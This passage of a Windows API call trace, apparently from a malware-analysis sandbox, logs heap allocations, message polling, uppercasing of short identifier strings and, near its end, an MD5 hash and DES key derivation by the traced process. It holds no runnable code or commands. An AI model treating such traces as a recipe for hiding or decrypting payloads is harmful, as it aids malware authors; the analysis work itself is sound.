RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0190.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.386] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0190.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0190.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0190.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0190.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0190.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0190.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0190.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0190.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0190.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0190.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.387] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0190.387] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0190.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab310 [0190.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.388] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0190.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0190.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0190.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0190.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0190.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0190.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0190.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.388] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0190.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0190.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0190.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0190.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0190.389] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.389] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0190.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0190.389] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0190.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7a8 [0190.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0190.389] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0190.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0190.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0190.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0190.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0190.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0190.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0190.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.390] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0190.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0190.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0190.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0190.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0190.390] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.390] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0190.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0190.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0190.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0190.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0190.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0190.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0190.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0190.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0190.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0190.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0190.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0190.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0190.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0190.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0190.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0190.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0190.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0190.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0190.392] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.392] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.392] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0190.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.392] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0190.392] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0190.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0190.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0190.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0190.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.393] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.393] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0190.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0190.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0190.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0190.393] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.393] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.393] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.394] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.394] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.394] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.394] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.394] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.394] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.394] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0190.394] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.394] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0190.394] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.394] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.394] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.394] CryptCreateHash (in: hProv=0xaa3868, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0190.395] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.395] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.395] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.395] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.395] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0190.395] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.395] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.395] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.395] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.395] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.395] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.395] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.395] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.395] CryptHashData (hHash=0xaa58e0, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0190.395] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.395] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.396] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.396] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.396] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.396] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.396] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.396] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.396] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0190.396] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.396] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0190.396] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.396] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.396] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.396] CryptDeriveKey (in: hProv=0xaa3868, Algid=0x6601, hBaseData=0xaa58e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0190.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0190.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0190.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0190.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0190.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0190.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0190.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0190.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0190.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0190.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0190.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0190.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0190.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0190.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0190.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0190.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0190.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0190.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0190.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0190.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0190.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0190.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0190.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0190.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0190.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0190.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0190.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0190.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 